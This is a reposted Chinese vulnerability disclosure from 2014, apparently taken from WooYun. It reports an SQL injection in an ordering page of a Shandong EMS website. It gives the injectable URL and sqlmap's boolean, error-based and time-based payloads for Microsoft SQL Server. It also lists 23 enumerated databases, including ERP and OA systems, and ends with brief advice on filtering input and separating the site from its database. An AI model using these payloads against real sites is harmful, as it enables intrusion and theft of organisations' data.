记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

山东ems整站数据库沦陷(不知道有几千张表)

2014-10-11 23:25

1.注入点:

http://www.sdems.com.cn/shop/ordershop.asp?id=20104774444030&orderid=1 (GET)

2.payload

sqlmap identified the following injection points with a total of 54 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=20104774444030%' AND 5635=5635 AND '%'='&orderid=1



Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: id=20104774444030%' AND 5564=CONVERT(INT,(SELECT CHAR(113)+CHAR(101)+CHAR(121)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (5564=5564) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(100)+CHAR(111)+CHAR(113))) AND '%'='&orderid=1



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)

Payload: id=20104774444030%' AND 6250=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='&orderid=1

---

web server operating system: Windows 2003 or XP

web application technology: ASP.NET, Microsoft IIS 6.0

back-end DBMS: Microsoft SQL Server 2005



3.库:团购。公司OA。ERP。海尔ERP。太多敏感库了

available databases [23]:

[*] DianCMS

[*] EMS_ERPbate

[*] ems_OA

[*] EMSERP

[*] EMSERP_0106

[*] EMSERP_0501

[*] EMSERP_07161

[*] EMSERP_1223

[*] EMSERP_830

[*] EMSERP_910

[*] EMSERPNEAR

[*] emstuan

[*] HaierERP

[*] INGNET_TCG

[*] INGNETERP

[*] master

[*] model

[*] msdb

[*] tempdb

[*] TUAN39

[*] tuangou

[*] WJM

[*] WJM_EN

表太多了,跑的话时间太长,仅截一个库的图做证明。

QQ截图20140827170108.png

漏洞证明:

1.注入点:

http://www.sdems.com.cn/shop/ordershop.asp?id=20104774444030&orderid=1 (GET)

2.

库:团购。公司OA。ERP。海尔ERP。太多敏感库了

available databases [23]:

[*] DianCMS

[*] EMS_ERPbate

[*] ems_OA

[*] EMSERP

[*] EMSERP_0106

[*] EMSERP_0501

[*] EMSERP_07161

[*] EMSERP_1223

[*] EMSERP_830

[*] EMSERP_910

[*] EMSERPNEAR

[*] emstuan

[*] HaierERP

[*] INGNET_TCG

[*] INGNETERP

[*] master

[*] model

[*] msdb

[*] tempdb

[*] TUAN39

[*] tuangou

[*] WJM

[*] WJM_EN

表太多了,跑的话时间太长,仅截一个库的图做证明。

QQ截图20140827170108.png



修复方案:

首先,sql注入,过滤,大家都知道。



再次,各个网站的数据库都在一起的话,最好站库分离,确保数据库安全,不然一个小漏洞会导致大问题。

知识来源: www.wooyun.org/bugs/wooyun-2014-074081

阅读:232212 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“山东ems整站数据库沦陷(不知道有几千张表)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云